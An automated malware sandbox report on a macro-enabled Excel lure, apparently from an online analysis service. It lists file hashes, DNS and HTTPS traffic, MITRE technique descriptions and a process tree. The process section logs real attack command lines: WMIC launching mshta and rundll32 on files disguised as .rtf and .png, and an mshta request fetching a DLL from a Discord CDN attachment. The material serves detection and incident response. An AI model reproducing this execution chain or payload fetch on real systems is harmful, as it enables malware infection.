File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Sep 22 22:27:58 2021, atime=Wed Sep 22 22:27:58 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	895
Entropy (8bit):	4.4797319927464185
Encrypted:	false
SSDEEP:
MD5:	DB989D1846CD9FE37FEF7FDE63227772
SHA1:	8CC79A92C896829423D08FFE77F42F5FD59C3D50
SHA-256:	A53AF972E91F5CDC429DD0AFABEF1D0055DA956E7ED8664672B8010CD169D8E7
SHA-512:	4430477B87D750E494E0B4930A2C393D8BB086C42507F24A8E397B7F9C63D440BFC89ED43F763BF0E9BCEF9ABFF74698DAAF48E5D31BF9DA2E776B5FC645E002
Malicious:	false
Preview:	L..................F...........7G...>Oz.....>Oz.....0......................o....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!....&=....U...............A.l.b.u.s.......1.....6S....DOCUME~1..h......QK.X6S.....[=..............>.....D.o.c.u.m.e.n.t.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.......k...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Documents.......\.....\.....\.....\.....\.D.o.c.u.m.e.n.t.s.............m...............#.F..l.H.i.m...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9n.[........}EkD_....3N...W...9n.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	150
Entropy (8bit):	4.704187608109783
Encrypted:	false
SSDEEP:
MD5:	534D479FA08094E2E5DFBD5544FB1944
SHA1:	09E238CA6E9AFD96BFFB923FFD50EBB5D650F447
SHA-256:	9615002412A30CE7F44BA3D7E98E2218E5C257A5952A68CDA9DD79E785E4BDD6
SHA-512:	F6AB08EF5E88F75693800552DB62CEEFCE8A03C3D510EC1D05862EA0F6A38AE99883FFACB655D3E49B7551D6004A904DB88C8AA7C058516470E15DE10B08F045
Malicious:	false
Preview:	My Documents.LNK=0..[misc]..Amendment.-0428767170_20210922.LNK=0..Amendment.-0428767170_20210922.LNK=0..[misc]..Amendment.-0428767170_20210922.LNK=0..

C:\Users\user\Desktop\~$Amendment.-0428767170_20210922.xlsb Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\4C730000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	105555
Entropy (8bit):	7.654767742368441
Encrypted:	false
SSDEEP:
MD5:	755E7A3BA62C4151E42382250DDC8807
SHA1:	D044B50911BF1E0C908B82F168D2259DE5DAB2D8
SHA-256:	17DF40387623CCE985F1071FB3EC132F3BE00FCE2333D0B0A009B86FED20DA18
SHA-512:	98A1B69C57FF19BD0C9A2042925EAD346DE9E45E679E0018239A6445B0C59564C6031D81DB4761847E283B7DF4EFE8B7A62183B9CBA86BED32848B97947F1686
Malicious:	false
Preview:	.U.n.0....?..."......C..=..!E............d..`+Q}......W....j..M.........._7....3.0K.......d7.......X..c.69./B....C.O;......."J.$. >.f...>..u..l......\...G.h<..........Q2S.b.5wXC..r..dN....I.......I,.,.....q%..~.....2..e..!gN..l......e.r.q.Q\.j.XX......Q.8.o.\|....~Q7$....)...........(..X>....C.Q./.w...$D....G..Cz..TN..\...D2.7..u.....6.h..y..0.-.......Tp..qR....^.4........,.3u.BD.q..W.81...D.).8.sE9).0..8..P...=U[m1.w.\|OsF\t..._.......PK..........!.u7..............[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\Amendment.-0428767170_20210922.xlsb (copy) Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	105555
Entropy (8bit):	7.654767742368441
Encrypted:	false
SSDEEP:
MD5:	755E7A3BA62C4151E42382250DDC8807
SHA1:	D044B50911BF1E0C908B82F168D2259DE5DAB2D8
SHA-256:	17DF40387623CCE985F1071FB3EC132F3BE00FCE2333D0B0A009B86FED20DA18
SHA-512:	98A1B69C57FF19BD0C9A2042925EAD346DE9E45E679E0018239A6445B0C59564C6031D81DB4761847E283B7DF4EFE8B7A62183B9CBA86BED32848B97947F1686
Malicious:	false
Preview:	.U.n.0....?..."......C..=..!E............d..`+Q}......W....j..M.........._7....3.0K.......d7.......X..c.69./B....C.O;......."J.$. >.f...>..u..l......\...G.h<..........Q2S.b.5wXC..r..dN....I.......I,.,.....q%..~.....2..e..!gN..l......e.r.q.Q\.j.XX......Q.8.o.\|....~Q7$....)...........(..X>....C.Q./.w...$D....G..Cz..TN..\...D2.7..u.....6.h..y..0.-.......Tp..qR....^.4........,.3u.BD.q..W.81...D.).8.sE9).0..8..P...=U[m1.w.\|OsF\t..._.......PK..........!.u7..............[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\~$Amendment.-0428767170_20210922.xlsb Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.64777854444857
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 34.81% Excel Microsoft Office Binary workbook document (47504/1) 32.42% Excel Microsoft Office Open XML Format document (40004/1) 27.30% ZIP compressed archive (8000/1) 5.46%
File name:	Amendment.-0428767170_20210922.xlsb
File size:	103606
MD5:	19989ff08d6e0accb9d233f5477bb216
SHA1:	a7b9f2c08fceca215ab866f59269d416bc8f8f09
SHA256:	91164696edc4efba635e5246a48693e8fd75db2eef8e06e354848365b9fead55
SHA512:	75714e4f3a35a678fb824895ff3c13d6f0a725d726ab19ee9c0054aa0412251c9b245e4c590826c34b587e9f1310856db84c0b58cb76fc3934e4152ee8610b2a
SSDEEP:	3072:oUX0h03aNFiH9wrivvpUaZA1tTcTwvtB6+A+O:o4avi2G5Du1tTcTw1xy
File Content Preview:	PK..........!...%.............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2ea8aa4b4b4b4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2021 16:27:39.766665936 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:39.766729116 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:39.766983986 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:39.796576023 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:39.796596050 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:39.853028059 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:39.854120970 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:39.872029066 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:39.872059107 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:39.872555017 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:39.873301983 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:40.331166983 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:40.356477022 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:40.356570005 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:40.356630087 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:40.356692076 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:40.356730938 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:40.356746912 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:40.356827021 CEST	443	49167	162.159.135.233	192.168.2.22
Sep 22, 2021 16:27:40.360008955 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:40.363059044 CEST	49167	443	192.168.2.22	162.159.135.233
Sep 22, 2021 16:27:40.363111019 CEST	443	49167	162.159.135.233	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2021 16:27:39.698695898 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 22, 2021 16:27:39.719165087 CEST	53	52167	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 22, 2021 16:27:39.698695898 CEST	192.168.2.22	8.8.8.8	0xe576	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 22, 2021 16:27:39.719165087 CEST	8.8.8.8	192.168.2.22	0xe576	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Sep 22, 2021 16:27:39.719165087 CEST	8.8.8.8	192.168.2.22	0xe576	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Sep 22, 2021 16:27:39.719165087 CEST	8.8.8.8	192.168.2.22	0xe576	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Sep 22, 2021 16:27:39.719165087 CEST	8.8.8.8	192.168.2.22	0xe576	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Sep 22, 2021 16:27:39.719165087 CEST	8.8.8.8	192.168.2.22	0xe576	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	162.159.135.233	443	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-22 14:27:40 UTC	0	OUT	GET /attachments/890212086519566369/890212261132636200/5_samsrv.dll.dll HTTP/1.1 Accept: / User-Agent: xFmKaIM Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: cdn.discordapp.com Connection: Keep-Alive
2021-09-22 14:27:40 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 22 Sep 2021 14:27:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oWvkUHNL6G%2BXFVwWaeDniGbp58cYqR8MOGOCeQYRUckd8S%2FxKBVs%2FNhg08E8rsQDQTEhHtnYZrapdY7CfDbdZcQ%2B296Au8%2FlgdA2xF2JKIxwwH7nhD765n8pJUb8bA5cW0Dk%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 692c37211c69694c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-22 14:27:40 UTC	1	IN	Data Raw: 31 31 30 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 110b<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2021-09-22 14:27:40 UTC	1	IN	Data Raw: 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 2c 70 72 6f 6a 65 63 74 69 6f 6e 22 20 2f 3e 0a 3c 21 2d 2d Data Ascii: 1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...
2021-09-22 14:27:40 UTC	2	IN	Data Raw: 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66 6c 61 67 67 65 64 20 61 73 20 70 68 69 73 68 69 6e 67 2e 20 50 68 69 73 68 69 6e 67 20 69 73 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 61 63 71 75 69 72 65 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 Data Ascii: wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and cr
2021-09-22 14:27:40 UTC	4	IN	Data Raw: 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 30 20 73 6d 3a 70 79 2d 34 20 73 6d 3a 70 78 2d 38 20 6d 78 2d 61 75 74 6f 20 74 65 78 74 2d 63 65 6e 74 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f Data Ascii: ntact the Trust & Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid bo
2021-09-22 14:27:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1664 Parent PID: 596

General

Start time:	16:27:20
Start date:	22/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f770000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: WMIC.exe PID: 2580 Parent PID: 1664

General

Start time:	16:27:34
Start date:	22/09/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic process call create 'mshta C:\ProgramData\gvREyChXMcc.rtf'
Imagebase:	0xff3a0000
File size:	566272 bytes
MD5 hash:	FD902835DEAEF4091799287736F3A028
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mshta.exe PID: 2608 Parent PID: 1304

General

Start time:	16:27:35
Start date:	22/09/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta C:\ProgramData\gvREyChXMcc.rtf
Imagebase:	0x13f7f0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mshta.exe PID: 2540 Parent PID: 2608

General

Start time:	16:27:38
Start date:	22/09/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta C:\\ProgramData\defdoc.rtf
Imagebase:	0x13f7f0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: WMIC.exe PID: 1724 Parent PID: 2540

General

Start time:	16:27:39
Start date:	22/09/2021
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic process call create 'rundll32.exe C:\\ProgramData\defdoc.png FilterCreate'
Imagebase:	0xff410000
File size:	566272 bytes
MD5 hash:	FD902835DEAEF4091799287736F3A028
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2396 Parent PID: 1304

General

Start time:	16:27:40
Start date:	22/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\\ProgramData\defdoc.png FilterCreate
Imagebase:	0xffaf0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Amendment.-0428767170_20210922.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

